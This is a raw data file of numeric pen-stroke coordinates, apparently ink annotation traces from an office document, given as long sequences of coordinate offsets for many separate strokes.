0,0-1 491,-1 7 1,1 0-492,11 34 512,-9-36-512,1 3 0,-11-51 0,0-3 0,0-9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32:26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5 24575,'-11'-5'0,"-46"55"0,29-32 0,-11 19 0,-1 4 0,1-1 0,-11 9 0,-2 4 0,-10-3 0,16-12 0,-9 0 0,36-31 0,-8 8 0,15-13 0,11 3 0,9-5 0,57 40 0,-23-12 0,-2 5 0,2 5 0,19 29 0,0-6 0,-6 12 0,3 1 0,-22-13 0,3-7 0,-17-21 0,-7-18 0,-8-3 0,7-1 0,-12-6 0,2-5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5T14:41:18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107 283 24575,'0'43'0,"0"-20"0,0 18 0,0 2 0,0-13 0,0 13 0,0-16 0,0-4 0,0 1 0,0 12 0,0-7 0,0 0 0,0 5 0,0-21 0,-11 3 0,9-7 0,-13-7 0,13-30 0,-15-44 0,13-8-252,-5 24 1,-1-1 251,2-17 0,-1-16 0,3 36 0,0 1 0,4-19 0,-4-6 0,6 56 0,5 11 0,11 11 503,3 7-503,10 16 0,17 30 0,-16-9 0,16 15 0,-7-4 0,-12-31 0,6 19 0,-11-22 0,0 3 0,-3 5 0,2-7 0,-5 10 0,7-6 0,-3 8 0,15 3 0,-15-12 0,6 1 0,-11-10 0,6 4 0,-13-7 0,11 2 0,-18-5 0,4-4 0,-5 4 0,0-4 0,0-1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32:30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22 832 24575,'-11'0'0,"5"9"0,1-2 0,5 9 0,0 0 0,0-4 0,0 4 0,0 0 0,0-4 0,0 3 0,0 0 0,0-3 0,0 4 0,0-6 0,0 1 0,5-5 0,-4 4 0,9-9 0,-4 4 0,9-5 0,-3 0 0,4 0 0,-1 0 0,3 0 0,-2 0 0,11 0 0,-3-5 0,4-6 0,-1-6 0,-6-5 0,-9 1 0,-2-17 0,-10 12 0,0-33 0,0 25 0,0-10 0,-10 11 0,-3 4 0,-9 6 0,0 1 0,0 12 0,5 4 0,2 1 0,-6 5 0,7 0 0,-22 0 0,11 0 0,-3 0 0,17 0 0,12 0 0,10 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,9 0 0,-7 0 0,7 0 0,-4 0 0,1 0 0,-1 0 0,0 0 0,-10 5 0,-2 1 0,-4 9 0,5 2 0,-4 10 0,9-5 0,-9 6 0,18 9 0,-10-6 0,12 8 0,-15-17 0,8 9 0,-11-12 0,6 7 0,-4-11 0,-4-4 0,4 0 0,0-5 0,-4 3 0,9-8 0,-5 4 0,11-5 0,-4 5 0,3-4 0,-4 4 0,0-5 0,4 0 0,2 0 0,42-38 0,-22 2 0,21-32 0,-35 18 0,-3-35 0,-6 7 0,-6 17 0,-2-2 0,-2 7 0,-2 2 0,-2-2 0,0 3 0,0-32 0,0 15 0,0 28 0,0 9 0,0 16 0,-5 6 0,-1 1 0,-5 9 0,-4-9 0,3 9 0,-9-8 0,9 3 0,-4-5 0,6 5 0,4-4 0,-4 9 0,4-4 0,0 27 0,1 0 0,5 20 0,0 20 0,0-19 0,0 26 0,0 2 0,0-3 0,0 11 0,6 7 0,1-33 0,6 23 0,-5-37 0,8 33 0,-13-34 0,13 33 0,-10-45 0,5 6 0,0-22 0,-5 0 0,3-9 0,-3 8 0,5-7 0,-1 2 0,16 6 0,-6-7 0,7 7 0,0-5 0,-4-4 0,6 4 0,-2-5 0,-6-4 0,1-13 0,1-19 0,-5-29 0,-1 6 0,-10-18 0,3 29 0,-9-5 0,5 18 0,-6 2 0,0 16 0,0 1 0,0 5 0,0 1 0,0-1 0,5 37 0,2-13 0,5 38 0,6-3 0,-5-13 0,0 12 0,-3-14 0,-4 3 0,6 0 0,-6-4 0,-1-10 0,-1-11 0,2-1 0,5-10 0,0 0 0,-5 0 0,-2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32:31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32:35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24575,'0'53'0,"0"1"0,0 4 0,0 37 0,0-27 0,0 3 0,0-8 0,0-3 0,0 40 0,0-42 0,0-1 0,0 41 0,0-20 0,0 1 0,0-13 0,0-10 0,0 12 0,0 1 0,0-12 0,0-10 0,0-25 0,0-6 0,5-6 0,-4 1 0,4-5 0,-5-1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32:37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24575,'54'0'0,"1"0"0,34 0 0,-19 0 0,11 0 0,10 0 0,11 0 0,-9 0 0,-15 0 0,0 0 0,15 0 0,10 0 0,-13 0 0,-23 0 0,-6 0 0,0 0 0,0 0 0,0 0 0,-2 0 0,34 0 0,-36 0 0,-23 0 0,-14 15 0,-12 13 0,13 17 0,2 42 0,-1-32 0,-5-5 0,0 3 0,11 30 0,3 3 0,-3 10 0,-1 0 0,-12-33 0,4 13 0,-2-29 0,-9-19 0,3 3 0,-11-20 0,4-5 0,-2 3 0,2-3 0,-4 5 0,0-1 0,0 6 0,0-4 0,0 13 0,0-12 0,0 23 0,0-16 0,0 24 0,0-24 0,0 12 0,0-10 0,-5-4 0,-23 8 0,-17-7 0,-39 0 0,-9 6 0,16-16 0,-3-3 0,19 2 0,-1-2 0,-26-2 0,2-2 0,-13-2 0,33 0 0,-9 1 0,7-2 0,10-2 0,1 0 0,-39 0 0,3-1 0,1-9 0,22 1 0,21 5 0,21 2 0,16 5 0,7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32:39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0 909 24575,'0'-11'0,"10"-32"0,11 11 0,23-46 0,-2 39 0,10-17 0,-5 14 0,19-12 0,-11-5 0,17 4 0,-37 18 0,-1 0 0,38-18 0,-28 13 0,1-2 0,-5 12 0,0 2 0,25-29 0,-20 17 0,-13 24 0,-20 4 0,9 13 0,-9-15 0,4 14 0,0-9 0,11 11 0,-2 0 0,9 0 0,6 0 0,17 0 0,-5 13 0,1 3 0,22 2 0,-18 8 0,-2 3 0,6 10 0,21 12 0,-13-7 0,-8-8 0,-2-6 0,-11-17 0,-1 3 0,-2-15 0,-15 4 0,-2-5 0,-8 0 0,-8 0 0,-2 5 0,-5 1 0,-5 9 0,0-3 0,0 4 0,0 5 0,-5-2 0,-8 15 0,-1 4 0,-22 33 0,6 5 0,5-28 0,-2 3 0,1 9 0,1-1 0,-20 24 0,8-5 0,20-42 0,8-24 0,8 4 0,-4-5 0,5-6 0,0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32:40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 24575,'0'44'0,"0"3"0,0 25 0,0-13 0,6 6 0,0-10 0,1-21 0,3 0 0,-4-13 0,0-9 0,-1 3 0,-5 1 0,0-4 0,0 3 0,0-4 0,0-1 0,0 7 0,0-5 0,0 37 0,0-3 0,0 23 0,2 29 0,1 2 0,-1-16 0,3 11 0,1-10 0,-5-56 0,4-8 0,-5-10 0,0-1 0,0 6 0,0-4 0,-5 3 0,-1 6 0,-5-2 0,0 3 0,-1 11 0,1-19 0,-1 18 0,-9-9 0,2 6 0,-3-6 0,6-2 0,5-10 0,-5 15 0,4-2 0,0 4 0,3-3 0,8-13 0,-15 8 0,3-7 0,1-2 0,1-6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32:43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1 244 24575,'0'11'0,"0"10"0,0-8 0,0 13 0,0-8 0,0 5 0,0 0 0,0 7 0,0 28 0,0-6 0,0 8 0,0 15 0,0-42 0,0 27 0,0-71 0,0-26 0,0-29 0,0-7 0,-1 22 0,2 0 0,5-37 0,-1 16 0,2 0 0,7-18 0,3 16 0,-11 44 0,3 29 0,-3-4 0,5 5 0,-5 5 0,4 23 0,-9-6 0,5 24 0,-6 2 0,0 4 0,0 9 0,5-13 0,-4-9 0,5-11 0,-6-1 0,0-10 0,0-2 0,0 1 0,0-4 0,0 8 0,0-4 0,0 6 0,0-1 0,0 1 0,-11-10 0,9 7 0,-4-6 0,8 10 0,8 11 0,-9-8 0,4 7 0,-5 7 0,0-8 0,0 9 0,0-18 0,0-2 0,0-31 0,0-25 0,0-16 0,0-20 0,0 0 0,0 20 0,0-18 0,6 13 0,6-4 0,7-18 0,4 27 0,0 0 0,-1 24 0,-1 5 0,1 5 0,-1-3 0,0 8 0,-4-4 0,41-11 0,-14 1 0,21-5 0,-10 4 0,-29 14 0,11 2 0,-15 6 0,-6 10 0,-5 11 0,-6 3 0,0 9 0,-4 22 0,4-20 0,-5 37 0,0-39 0,0 28 0,0-28 0,0 22 0,0-5 0,0-8 0,0 0 0,0-22 0,0-9 0,0-1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32:44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24575,'0'11'0,"0"10"0,0-2 0,0 30 0,0-26 0,0 20 0,0-8 0,0-8 0,0 13 0,0 0 0,0 10 0,6 23 0,0-25 0,16 6 0,-8-35 0,13 4 0,-9-6 0,4-1 0,-4-9 0,-3 3 0,1-10 0,0 0 0,15-10 0,-6-13 0,7-19 0,-9-6 0,1-12 0,-11 12 0,-2 0 0,-11 3 0,0 14 0,0-7 0,0 14 0,-5-3 0,-11 5 0,-8-6 0,-31-1 0,21 4 0,-19 4 0,35 15 0,-3 1 0,10 5 0,1 0 0,-1 0 0,5-5 0,-4 4 0,9-4 0,-4 5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32:45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24575,'60'17'0,"-17"-2"0,17 11 0,-29-9 0,22 1 0,-24-5 0,17 5 0,-18-12 0,-9-1 0,6 0 0,-7 7 0,5 16 0,0-7 0,-9 7 0,6-7 0,-12-7 0,7 7 0,-9-16 0,-1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32:46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 24575,'-10'31'0,"-10"22"0,6-30 0,-14 28 0,8-1 0,-1-6 0,-4 17 0,2 4 0,8-17 0,-3 16 0,3-34 0,12-9 0,-7 0 0,5 3 0,4 5 0,-9-7 0,4 10 0,0-12 0,-10 17 0,13-24 0,-7 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5T14:41:22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169 793 24575,'-5'-16'0,"-7"-2"0,-11-16 0,-3 2 0,2-10 0,1-6 0,10 14 0,-5-12 0,6 10 0,5-11 0,2 15 0,5-5 0,0 24 0,0-8 0,0-6 0,9 8 0,3-12 0,10 19 0,4-4 0,-8 10 0,2 1 0,-10 5 0,1 0 0,0 0 0,0-4 0,4 2 0,-3-2 0,3 4 0,1-5 0,-4-1 0,3 0 0,1 1 0,-5 5 0,5-10 0,11-31 0,-6 11 0,8-20 0,-12 27 0,-6 5 0,-5 6 0,-1 7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32:47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24575,'0'21'0,"0"-3"0,0 17 0,0 11 0,0-17 0,0 15 0,0-10 0,0-7 0,0 13 0,0-12 0,0 1 0,0 0 0,0-2 0,0-11 0,0-5 0,0-6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32:48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32:50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1 259 24575,'11'0'0,"22"0"0,-12 0 0,19 0 0,-6 0 0,-8 0 0,7-5 0,-10 4 0,0-9 0,0 4 0,-1-5 0,1 0 0,0-6 0,-5 5 0,8-14 0,-8 2 0,10-10 0,-11-5 0,-6 14 0,-6-1 0,-9 20 0,-2 1 0,-11 5 0,-17 0 0,0 0 0,-8 0 0,6 0 0,5 0 0,-11 0 0,10 0 0,3 0 0,13 0 0,5 0 0,0 0 0,1 9 0,-1-2 0,0 14 0,5 1 0,-4 6 0,9 1 0,-9 14 0,9-11 0,-4 18 0,5 7 0,0-10 0,0 32 0,0-32 0,5 16 0,1-28 0,5 3 0,0-15 0,5 4 0,-4-15 0,8-3 0,-3-9 0,4 0 0,-4 0 0,14 0 0,6-11 0,-5 4 0,7-10 0,-22 5 0,1 6 0,8-5 0,-8 10 0,0-4 0,-9 5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34:02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24575,'90'0'0,"1"9"0,7 6 0,-15 2 0,5 6-1917,-6 1 1,12 4 0,0 3 0,-12-1 1916,-17-3 0,-8 1 0,5 1 0,10 0 0,6 3 0,0 0 0,-9-2 542,8 10 0,0 1-542,-12-9 0,8 1 0,1 1 0,-6 0 0,-1 1 0,-5-1 0,2 2 0,16 9 0,3 2 0,2-2 0,1-1 0,1-2 0,4 0 0,-8-7 0,3 1 0,1 0 0,-2-2 0,-11-3 0,-2-1 0,0-1 0,1-1 0,8 1 0,2 0 0,-2-1 0,-5-1 0,-2 1 0,-5 0 0,0-1 0,6 1 0,0-1 0,3 2 0,-9-2 0,3 2 0,1-1 0,-2 0 0,19 5 0,-1-2 0,-4-1 471,-18-4 1,-3 0 0,5-1-472,3-3 0,5 0 0,0-1 0,-5-2 0,-4 0 0,-5-1 0,1-1-407,11 2 0,2-1 0,-6-2 407,7-3 0,-7-3 0,-13-2 0,0-3 0,1-4 0,4 0 1138,1 3 1,6 1 0,-2-1-1139,20-3 0,2 0 0,-12 3 0,4 1 0,-2 0 0,-9-2 0,-2-1 0,1 2 0,15 3 0,1 1 0,-5 0 0,0 0 0,-1 1 0,-14 0 0,3 2 0,-5-3 507,8-2 0,-5-2-507,1 3 0,-2-1 0,-7-5 0,-4-2 0,8 1 0,-12 1 0,0-2 0,25-10 802,-18 10 0,2-1-802,29-16 353,3 11-353,-38-3 0,0 0 0,1 0 0,1-2 0,5-4 0,2-2 0,5-2 0,-2-1 0,-11 3 0,-2 0 0,3 1 0,-5 2 0,4-2 0,-9 11 0,-12 1 0,0 5 0,0 0 0,0 0 0,5 10 0,2 8 0,10 11 0,-19-9 0,9-1 0,-28-17 0,12 2 0,10-4 0,-1 0 0,7 0 0,12 0 0,-1 0 0,10 0 0,4 0 0,-28 0 0,22 0 0,-4 0 0,-6 0 0,0 0 0,-1 0 0,-15-5 0,21-1 0,-27-5 0,-1 5 0,-6-4 0,-4 9 0,-6-4 0,-7 5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34:04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24575,'10'0'0,"47"11"0,-23-3 0,38 15 0,-34-9 0,0 10 0,3-11 0,-2 5 0,1-6 0,-15-1 0,-4-5 0,0-1 0,-2-5 0,13 5 0,-7-4 0,-3 4 0,10 0 0,-12-3 0,8 3 0,-1 0 0,-14-4 0,8 4 0,-5-5 0,-4 4 0,-2 2 0,-5 5 0,-5 0 0,0-1 0,0 1 0,-5 0 0,-42 41 0,20-26 0,-6 10 0,-2 3 0,-18 22 0,-1-5 0,-10 18 0,-2-12 0,10 0 0,-3 1 0,18-20 0,18-15 0,12-18 0,6-5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34:51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562 1 24575,'-89'0'0,"31"0"0,4 0 0,1 0 0,-4 0 0,8 0 0,-5 11 0,32-4 0,-27 25 0,34-22 0,-11 20 0,19-17 0,-8 10 0,12-7 0,-7 11 0,10-14 0,0 8 0,0 0 0,0 3 0,0-1 0,0 4 0,0-15 0,0 9 0,0-9 0,14-1 0,-6-7 0,13-4 0,-11 0 0,17 0 0,-2 0 0,25 0 0,-24 0 0,5 0 0,-20 0 0,4 0 0,2 0 0,0 0 0,8-14 0,-12 6 0,12-18 0,-18 14 0,12-13 0,-17 12 0,8-8 0,-10 10 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0-4 0,4 8 0,-3-8 0,9 14 0,1 1 0,8 25 0,6 18 0,-3 9 0,2 7 0,-3-8 0,-1 1 0,1 6 0,0 0 0,1 0 0,-2-3 0,-3 6 0,9 25 0,-8-29 0,-4-9 0,-2-12 0,-6-9 0,-6-10 0,0 4 0,0-4 0,0-2 0,0-4 0,-11-5 0,-2-2 0,-27-4 0,-18 0 0,4-5 0,-15-9 0,22-6 0,1-4 0,-2-3 0,-20-15 0,23 17 0,4-1 0,10-2 0,11 7 0,19 14 0,-4-3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35:12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6 152 24575,'0'11'0,"0"22"0,0-11 0,0 17 0,0-5 0,0-14 0,0 12 0,0-9 0,0-4 0,-5-3 0,9-11 0,-3-5 0,9 0 0,1 0 0,5 0 0,12 0 0,3-6 0,8-5 0,21-43 0,-24 17 0,12-24 0,-22 29 0,-13 13 0,3-2 0,-7 11 0,-8-6 0,4 4 0,-5-8 0,5 8 0,-4-4 0,4 5 0,-5 0 0,-5 0 0,-1 5 0,-10-4 0,-54-1 0,34 3 0,-34-3 0,44 11 0,7 0 0,-4 0 0,7 0 0,5 0 0,0 0 0,0 0 0,5 0 0,1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35:14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 24575,'0'22'0,"0"0"0,0 23 0,0-16 0,0 22 0,6-3 0,1-13 0,5 18 0,6-5 0,5-3 0,3 15 0,6-20 0,-18-12 0,10-3 0,-12-13 0,4 4 0,4-10 0,-3-2 0,0-4 0,-2 0 0,-4 0 0,0-15 0,0 1 0,-4-8 0,-2 0 0,-5-16 0,0 10 0,0-25 0,0 22 0,0-2 0,0 5 0,0 1 0,0-1 0,-10-6 0,-3-1 0,-5-4 0,2 13 0,-5-20 0,-3 25 0,1-7 0,-9 13 0,13 14 0,-14-4 0,-1 5 0,4 0 0,2 0 0,2 0 0,13 0 0,-7 0 0,9 0 0,5 0 0,1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35:17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365 653 24575,'-48'0'0,"-2"0"0,8 0 0,2 0 0,-2 0 0,-13 0 0,31 0 0,-18 0 0,31 4 0,5 2 0,1 20 0,5-1 0,0 14 0,0-16 0,0 14 0,0-12 0,0 9 0,0-12 0,0-2 0,0-8 0,5 8 0,5-8 0,7 4 0,5-10 0,-1-2 0,11-4 0,-8 0 0,7 0 0,-4 0 0,-4-10 0,0 3 0,-7-10 0,0-43 0,-3 8 0,-7-4 0,-1-1 0,6-10 0,-10 1 0,5 28 0,-6 20 0,0 7 0,11 48 0,-2 10 0,10 18 0,3 22 0,-4-33 0,0 3 0,0-3 0,-1 3 0,5 14 0,1 0 0,0-6 0,-1-2 0,-5-3 0,1 0 0,4-2 0,0 3 0,2 15 0,0-4 0,6 3 0,-12-19 0,-3-7 0,-5-21 0,-10-13 0,0-4 0,-10-5 0,-8 4 0,-7-9 0,-3 4 0,5-5 0,-1 5 0,-8-3 0,1 3 0,-2-5 0,10-10 0,7-13 0,10-19 0,1-19 0,5-30 0,17 2 0,-4 20 0,6-3 0,6 16 0,4 0 0,1-18 0,0 2 0,-6 27 0,1-2 0,5-25 0,-2-7 0,-1 2 0,-3-4 0,-8 10 0,-1-5 0,-2 3 0,6-23 0,-5 6 0,-10 19 0,-2 9 0,-2-7 0,0 27 0,0 16 0,0-12 0,-5 25 0,-1-8 0,-5 10 0,0 0 0,-5 0 0,4 5 0,-3 2 0,-1 4 0,4 0 0,-23 0 0,20 0 0,-15 9 0,19-2 0,0 24 0,0-1 0,5 28 0,0 12 0,6 7 0,0 6 0,11-15 0,2-7 0,11-2 0,10 6 0,-12-18 0,15 13 0,-9-21 0,-3-13 0,0 4 0,-10-29 0,-3 8 0,4-7 0,-1 2 0,2-4 0,10 0 0,1 0 0,1 0 0,9 0 0,-12 0 0,24 0 0,19-10 0,-14-8 0,10-1 0,-33-17 0,-19 21 0,2-20 0,-15 21 0,0-17 0,0 1 0,0-20 0,0 6 0,0 5 0,0 18 0,0 10 0,0 0 0,-5 5 0,-1 1 0,-5 5 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,5 10 0,-3-8 0,3 13 0,-5 0 0,0-2 0,0 12 0,5-13 0,1 3 0,5 6 0,0-7 0,0 12 0,0 2 0,0 8 0,26 52 0,-15-47 0,21 32 0,-21-61 0,0 9 0,-5-9 0,4-1 0,0-2 0,2-3 0,9 0 0,-10-1 0,5-5 0,-1 0 0,-3 0 0,8 5 0,-3-4 0,10 4 0,1-5 0,-4 0 0,3 0 0,-11 0 0,-3 0 0,-3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35:26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24575,'0'21'0,"0"4"0,0 40 0,18 6 0,4 4 0,-11-26 0,2 3 0,12 18 0,7 10 0,-1-5 0,3 7 0,0-3 0,6 11 0,0 1 0,0 3 0,-3-7 0,-15-38 0,-1 0 0,2 20 0,0-2 0,9 2 0,-6 6 0,-10-37 0,-11-23 0,0 0 0,-4 2 0,8 0 0,-3 8 0,0-12 0,4 12 0,-9-13 0,9 8 0,-4 14 0,21 36 0,-11-9 0,12 26 0,-16-45 0,-1-2 0,0-7 0,-5-10 0,-2 4 0,1-6 0,1 0 0,5 1 0,0 5 0,0-4 0,0 4 0,-5-6 0,-1-4 0,-1 8 0,3-2 0,9 20 0,-4-1 0,0-6 0,-2-4 0,-9-20 0,9 4 0,-9-1 0,4-3 0,0 18 0,-4-16 0,4 11 0,-1-19 0,-2-1 0,2-5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5T14:41:23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1 514 24575,'10'0'0,"7"0"0,11 16 0,-8-2 0,12 14 0,-8 6 0,-6-14 0,-1 7 0,-7-17 0,-9 1 0,4-10 0,-5-14 0,0-13 0,10-22 0,-7 14 0,13-12 0,-9 10 0,4 5 0,0-8 0,0 16 0,0 1 0,0 6 0,-1 10 0,6 2 0,0 4 0,11 0 0,7 5 0,22 22 0,-16-11 0,9 22 0,-31-20 0,4 0 0,-9 4 0,19 11 0,-17-6 0,12 6 0,-7-8 0,-11-12 0,10 3 0,-18-33 0,4-12 0,-5-23 0,0-34 0,0 0 0,0-6 0,0 21 0,0 10 0,5 15 0,-4 2 0,4 17 0,-5 21 0,0 2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35:27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0 639 24575,'51'0'0,"-5"0"0,-11 0 0,22 5 0,-27 2 0,14-1 0,-23 4 0,-9-9 0,4 4 0,-6-5 0,1 0 0,0 0 0,-1 0 0,6 10 0,-4-8 0,8 12 0,-8-13 0,3 4 0,-4-5 0,-5-10 0,-1-3 0,-5-24 0,0-28 0,0-3 0,-6-13 0,-8-5 0,-1 26 0,-4-11 0,5 8 0,2 28 0,5-13 0,-4 20 0,10 9 0,-4-2 0,5 25 0,0-6 0,0 12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35:29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13 191 24575,'0'23'0,"0"20"0,0-7 0,0 25 0,0-12 0,-5 0 0,3-1 0,-4-13 0,6-16 0,0-14 0,0-7 0,0-37 0,0-13 0,0-2 0,0-15 0,0-29 0,0 29 0,0-23 0,0 53 0,0 21 0,0 3 0,10 9 0,-3 1 0,9 5 0,-1 0 0,2 0 0,0 0 0,10 10 0,-4-3 0,11 14 0,5 1 0,-14-4 0,11 14 0,-22-14 0,28 42 0,-20-25 0,16 20 0,-16-28 0,-6-6 0,0-4 0,-6-6 0,1 3 0,0-7 0,-5 4 0,-2-7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36:05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1 24575,'-11'0'0,"0"0"0,1 0 0,-7 0 0,5 0 0,-4 0 0,-1 0 0,-7 0 0,-1 0 0,-5 5 0,1 7 0,-35 35 0,14-16 0,-9 20 0,37-33 0,17 4 0,15-10 0,3 10 0,27 7 0,-7-2 0,10 14 0,-3-5 0,-3 6 0,-2-1 0,-2-1 0,-15-7 0,-7-4 0,-7 3 0,-4-3 0,0-6 0,0 13 0,0-12 0,-4 4 0,-7-12 0,-6-11 0,-10-5 0,-2-6 0,-5-10 0,-6-35 0,20 15 0,-6-23 0,25 40 0,-4-7 0,5 9 0,0-6 0,0 6 0,10 2 0,2-1 0,4 9 0,4-12 0,-8 16 0,4-11 0,4 3 0,-7-6 0,7 0 0,-9 2 0,0-1 0,-5 4 0,3-4 0,-3 1 0,0 3 0,3-4 0,-7 10 0,2 1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36:07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24575,'0'18'0,"0"8"0,0-12 0,0 7 0,0 0 0,0-3 0,0 15 0,0-14 0,0 2 0,0 0 0,0-8 0,0 8 0,0-10 0,0 9 0,0-7 0,0 12 0,5-13 0,1 3 0,9-4 0,2 0 0,4-1 0,1-4 0,-6 4 0,9-9 0,-11 4 0,6-5 0,5 0 0,4 0 0,1 0 0,-6 0 0,-13-10 0,0-7 0,-5-2 0,-1-7 0,-5 5 0,0-2 0,0 1 0,0-3 0,0 7 0,0-8 0,0 4 0,0 5 0,-4-3 0,-7 3 0,-1 0 0,-9-3 0,9 12 0,-8-6 0,8 13 0,-4-4 0,1 5 0,-2 0 0,-10 0 0,4 0 0,-5 0 0,7 0 0,4 0 0,1 0 0,1 0 0,3 0 0,1 0 0,6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36:12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123 283 24575,'0'18'0,"0"4"0,0 2 0,0 7 0,0 27 0,0-15 0,0 9 0,0-18 0,0-15 0,0 2 0,0-10 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,4 0 0,-2-22 0,2-5 0,-4-29 0,0-10 0,-13-15 0,-5-5 0,9 25 0,-1-1 0,-10-21 0,0 4 0,1 7 0,7 25 0,5 5 0,3 9 0,20 11 0,5 6 0,27 4 0,5 2 0,8-1 0,-7 3 0,1 0 0,16 5 0,-27 4 0,16-4 0,-30 2 0,5-4 0,-11 0 0,-3-1 0,-15-5 0,-1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36:13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1 24575,'-11'0'0,"-10"0"0,-5 0 0,-3 0 0,-1 0 0,-10 0 0,8 5 0,-10 1 0,15 5 0,14 0 0,14-5 0,22-2 0,9-4 0,3 0 0,5 6 0,-9 5 0,3 1 0,-12 4 0,-12-5 0,-5-1 0,-5 1 0,0 0 0,0 0 0,0-1 0,0 16 0,0-6 0,-10 29 0,-14-4 0,-13 4 0,-15 2 0,14-25 0,0 0 0,-5-9 0,15-10 0,-9 8 0,26-14 0,6 4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36:14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0 24575,'-11'0'0,"0"0"0,0 0 0,5 5 0,1 1 0,0 5 0,4-1 0,-4 1 0,5 0 0,0-1 0,20 6 0,-4-3 0,16 3 0,-14-5 0,4 1 0,-10-2 0,9 2 0,-9-2 0,-2 1 0,-5 0 0,-5-1 0,0 6 0,0-4 0,0 8 0,0-8 0,0 8 0,-10-3 0,-2 4 0,-15 1 0,-12 0 0,3-5 0,-35-6 0,24-6 0,-20-5 0,26 0 0,1 0 0,12 0 0,1 0 0,14 0 0,4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36:16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23590,'0'22'0,"0"2"486,0 14-486,0-2 165,0-5-165,0 36 83,0-34-83,0 38 251,0-23-251,0-8 0,0-1 0,0-13 0,0 3 0,0 7 0,0 29 0,0-25 0,0 13 0,0-30 0,0-8 0,0 1 0,0-5 0,0 5 0,0-15 0,4-2 0,2-15 0,6-1 0,-2 0 0,2-10 0,-1 13 0,0-7 0,0 5 0,10-7 0,-7 4 0,7-3 0,0 1 0,-7 2 0,18-9 0,-18 5 0,11 1 0,-7-1 0,3 7 0,0 0 0,-4 10 0,-2 1 0,-4 5 0,-5 5 0,4 6 0,-9 0 0,3 5 0,1 5 0,-4 2 0,9 17 0,-8-5 0,3 5 0,-5-12 0,0-6 0,0-6 0,5 4 0,-4-2 0,3 3 0,-4-6 0,0 1 0,0-4 0,0 3 0,5-4 0,-4-5 0,4-1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36:18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24575,'-16'0'0,"9"0"0,-4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36:44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24575,'31'0'0,"9"0"0,-15 0 0,13 0 0,0 0 0,7 0 0,-6 0 0,13 0 0,-5 0 0,7 0 0,7 0 0,11 0 0,7 0 0,-5 0 0,1 0 0,12 0 0,-1 0 0,-20 0 0,-4 0 0,25 0 0,5 0 0,-38 0 0,0 0 0,40 0 0,-10 0 0,-16 0 0,-18 0 0,-8 0 0,8 0 0,-22 0 0,26-5 0,-28 4 0,12-14 0,-3 7 0,27-19 0,-20 18 0,13-7 0,-22 11 0,3 4 0,0-4 0,1 5 0,-24 0 0,1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5T14:41:25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27 635 24575,'0'26'0,"0"8"0,0-20 0,6 31 0,0-34 0,1 27 0,-2-31 0,-5-17 0,0-1 0,0-30 0,0-7 0,-12 6 0,10-20 0,-21 23 0,20-6 0,-8 7 0,11 0 0,0-4 0,0 0 0,0-5 0,0 11 0,5-8 0,12 13 0,13-15 0,17 9 0,1 2 0,-5 11 0,-10 7 0,1 5 0,-14 1 0,11 4 0,-19 3 0,4 4 0,-10 0 0,-1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35:5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 24575,'-11'0'0,"-5"0"0,-2 0 0,0 0 0,-8 0 0,12 0 0,-7 0 0,15 5 0,1 1 0,5 9 0,0 2 0,0-1 0,0 0 0,0-6 0,0 11 0,0-8 0,0 7 0,0-9 0,27 5 0,1 2 0,20 1 0,-12-2 0,10 0 0,-14 6 0,14 2 0,-18 2 0,-6-10 0,-6 3 0,-5-4 0,-5 6 0,3-1 0,-8 1 0,4-6 0,-5 4 0,0-8 0,0 4 0,-5-10 0,-6-2 0,-6-4 0,-4 0 0,4 0 0,6-4 0,2-2 0,7-5 0,-2 0 0,4 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,4 5 0,-3-8 0,4 6 0,-5-7 0,0-1 0,0-1 0,0-4 0,0 4 0,0-4 0,0 8 0,-15-23 0,2 0 0,-9 0 0,10 6 0,7 19 0,5 0 0,0 5 0,0 1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35:58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0 24575,'-16'0'0,"4"0"0,-15 0 0,14 0 0,-14 0 0,15 0 0,-10 0 0,10 0 0,-3 0 0,-2 0 0,10 5 0,-3 1 0,10 5 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,14 11 0,10-3 0,17 9 0,6-3 0,-6-2 0,-1 1 0,-12-6 0,-1-1 0,-1-1 0,-8-3 0,2 4 0,-14-6 0,4-4 0,-9 4 0,8-4 0,-8 5 0,4 4 0,-5-3 0,0 3 0,0-4 0,0 0 0,-14-1 0,5-4 0,-11-1 0,9-5 0,5-5 0,1-1 0,5-5 0,0 1 0,0-1 0,0 0 0,0 0 0,0-5 0,0-7 0,0-1 0,0-4 0,0-13 0,0-12 0,0 8 0,0-3 0,0 31 0,0 1 0,0 5 0,0 5 0,0 2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35:59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 24575,'-11'0'0,"-16"0"0,7 0 0,-8 0 0,6 0 0,-16 0 0,11 0 0,-11 0 0,22 0 0,6 14 0,4-6 0,1 17 0,0-13 0,4 3 0,-4 6 0,15-8 0,3 3 0,27-6 0,-13-4 0,30 12 0,-9 5 0,-8-4 0,2 3 0,-25-6 0,0-4 0,-1 3 0,-6 1 0,-4-4 0,-1 13 0,-5-8 0,0 5 0,0-7 0,0 1 0,0-4 0,-10 3 0,3-4 0,-8-5 0,4-2 0,-5-4 0,-6 0 0,-1 0 0,-5 0 0,11 0 0,-4 0 0,4-14 0,5 1 0,2-9 0,10 2 0,0 3 0,0-10 0,0-7 0,0 9 0,0-1 0,0 15 0,0 1 0,5-1 0,-4 0 0,9 5 0,-5-8 0,11 1 0,-4-3 0,-2 0 0,0 10 0,-4 1 0,0 5 0,-1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36:01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0 24575,'-16'0'0,"4"0"0,-4 0 0,-25 0 0,16 0 0,-23 0 0,24 0 0,-9 0 0,7 0 0,-8 0 0,16 0 0,2 0 0,10 5 0,-4-4 0,9 14 0,6-7 0,18 29 0,23 0 0,-13-1 0,9-4 0,-19-10 0,11-3 0,11 18 0,-3-7 0,0 17 0,-24-18 0,-4 2 0,-14-15 0,0-6 0,0 1 0,-5-5 0,-1 3 0,-5-7 0,1 2 0,-1-4 0,-5 0 0,4 0 0,-4 0 0,1 0 0,3 0 0,-9 0 0,9-4 0,-3 2 0,9-7 0,1 3 0,5-5 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,5-5 0,6-12 0,6-2 0,6-9 0,-1 10 0,-5 2 0,-2 15 0,-9-3 0,4 9 0,-9 0 0,4 1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40:43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2499 1 24575,'-16'0'0,"-32"0"0,4 0 0,-6 0 0,-2 0 0,-18 0 0,-11 0 0,13 0 0,-13 0 0,16 0 0,-6 0 0,-4 0 0,-1 0 0,-3 